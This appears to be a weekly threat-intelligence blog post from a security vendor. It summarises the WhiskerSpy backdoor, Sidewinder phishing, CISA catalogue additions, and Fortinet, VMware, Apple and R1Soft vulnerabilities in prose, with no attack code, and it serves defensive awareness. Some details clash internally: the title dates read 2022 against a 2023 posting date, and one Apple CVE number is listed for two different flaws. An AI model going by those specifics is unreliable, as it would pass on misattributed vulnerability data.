CSW's Threat Intelligence - February 20, 2022 - February 24, 2022
Posted on Feb 20, 2023 | Updated on Feb 24, 2023 | By Supriya Aluri
This edition brings you early warnings, trending news about cyber threats, and the accurate threat context. Check out which threat group is on the rampage, what vulnerability it could soon weaponize, and more.
Why play catch up when you can fix this now?
- Earth Kitsune Uses New Malware, WhiskerSpy
- CISA Added 3 New Vulnerabilities to the KEV Catalog
- Indian APT Group Sidewinder Targets Educational Institutions
Vulnerabilities to Watch Out For
- CVE-2022-39952 and CVE-2021-42756: Critical Flaws in Fortinet
- CVE-2023-20858: Critical VMware Vulnerability
- Critical Vulnerabilities in Apple OS
- CVE-2022-36537: Vulnerability in R1Soft Server Backup Manager
Earth Kitsune Uses New Malware, WhiskerSpy
Earth Kitsune is a new threat actor known for targeting North Korean entities. In a recent campaign, researchers have found that the group is using a new backdoor known as WhiskerSpy. This malware was delivered to the victims’ devices when they tried to watch videos on a malicious website. The attacker compromised the website and injected a malicious script that asked the victim to install a video codec for the media to run. This tactic is known as a watering hole attack. WhiskerSpy can perform a number of actions including: interactive shell,
download file, upload file, delete file, list files, take screenshot, load executable and call its export, and inject shellcode into a process.
CISA Added 3 New Vulnerabilities to the KEV Catalog
On February 22, 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2022-47986, CVE-2022-41223, and CVE-2022-40765 to the Known Exploitable Vulnerabilities catalog.
CVE-2022-47986 is the IBM Aspera Faspex remote code execution vulnerability that could allow a remote attacker to execute arbitrary code in a compromised system. There is evidence that this vulnerability is actively exploited in the wild, especially after a proof of concept for the exploit was released.
We warned our customers regarding this vulnerability in last week’s threat intelligence blog.
CVE-2022-41223 and CVE-2022-40765 impact Mitel’s MiVoice Connect product. These code and command injection vulnerabilities allow an authenticated attacker with internal network access to execute arbitrary code. Mitel patched these vulnerabilities in October 2022 but they still are targeted by attackers.
Indian APT Group Sidewinder Targets Educational Institutions
Sidewinder (AKA Rattlesnake) is an Indian APT group that has been active since 2012. It carries out cyber espionage campaigns in Asian countries such as China, Pakistan, Bangladesh , etc. In a recent attack the group targeted Chinese scientific research universities and institutions using phishing emails with malicious attachments. In addition to this, they’ve also used template injection to deliver malicious documents and launched attacks on the Pakistani government, military and other units. The group is suspected to download trojan horses in every download to carry out subsequent attacks. To gain initial access, Sidewinder has exploited CVE-2017-11882. It is a Microsoft Office memory corruption vulnerability. It has over 1500 exploits and is associated with 8 ransomware strains.
CWE ID: CWE-119
Exploit Type: RCE,PE,WebApp
Affected Product Count: 4
APT Associations: Swede, Lone Wolf, and 21 others
Ransomware Associations: Zemblax, Fake Globe, and 6 others
Patch Link: Download
Vulnerabilities to Watch Out For
CVE-2022-39952 and CVE-2021-42756: Critical Flaws in Fortinet
Fortinet fixed two critical remote code execution flaws in its products.
CVE-2022-39952 affects FortiNAC. It has a critical rating of 9.8 on the CVSS scale. An external control of file name or path vulnerability [CWE-73] in FortiNAC web server may allow an unauthenticated attacker to perform arbitrary write on the system using this vulnerability.
Update: Threat actors are actively exploiting CVE-2022-39952 targeting Internet-exposed Fortinet appliances. They’ve been observed using corn jobs to open reverse shells to attackers' IP addresses after gaining initial access.
CVE-2021-42756 affects FortiWeb and it has 9.3 on the CVSS scale. Multiple stack-based buffer overflow vulnerabilities [CWE-121] in FortiWeb's proxy daemon may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests.
CVE-2023-20858: Critical VMware Vulnerability
CVE-2023-20858 is a vulnerability in VMware’s Carbon Black App Control product. It rates 9.1 on the CVSS scale. An authenticated threat actor with access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system. VMware released a security advisory for this vulnerability and urged users to update to versions 8.7.8, 8.8.6, and 8.9.4 to mitigate potential risks.
Critical Vulnerabilities in Apple OS
CVE-2023-23530, CVE-2023-23531, and CVE-2023-23520 were recently disclosed by Apple in a security advisory.
CVE-2023-23520 is due to a race condition in the Crash Reporter component. If exploited, it could enable a malicious actor to read arbitrary files as root.
CVE-2023-23531 and CVE-2023-23520 are present in the Foundation Framework. They could allow an attacker to remotely execute code in the compromised device.
All three are classified as medium severity vulnerabilities.
CVE-2022-36537: Vulnerability in R1Soft Server Backup Manager
CVE-2022-36537 is actively being exploited by deploying backdoors. It is a vulnerability in the ZK Java Framework that R1Soft Server Backup Manager utilizes. An attacker can exploit it to bypass authentication and even remotely execute code in R1Soft server software and its connected backup agents. In one of the recent attacks, researchers discovered that the vulnerability was used to gain initial access and drop a malicious JDBC driver. This driver can load new functionalities in memory and execute commands. ZK released a security advisory for this vulnerability and recommends users to patch it as soon as possible.
Check out this section to track how these threats evolve!
We use our threat intelligence platform driven by Artificial Intelligence (AI) and Machine Learning (ML) models to analyze the vulnerabilities that hackers could potentially exploit. We warn our customers continuously about exposures and prioritize vulnerabilities to facilitate rapid remediation.
Follow our weekly blog and podcast to get proactive alerts on trending threats. Reach out to us if you need help managing your vulnerabilities and exposures.
Leverage our expertise and manage your threats continuously to stay safe from attackers.
Never miss a patch or an update with CSW's Patch Watch Newsletter. Subscribe now!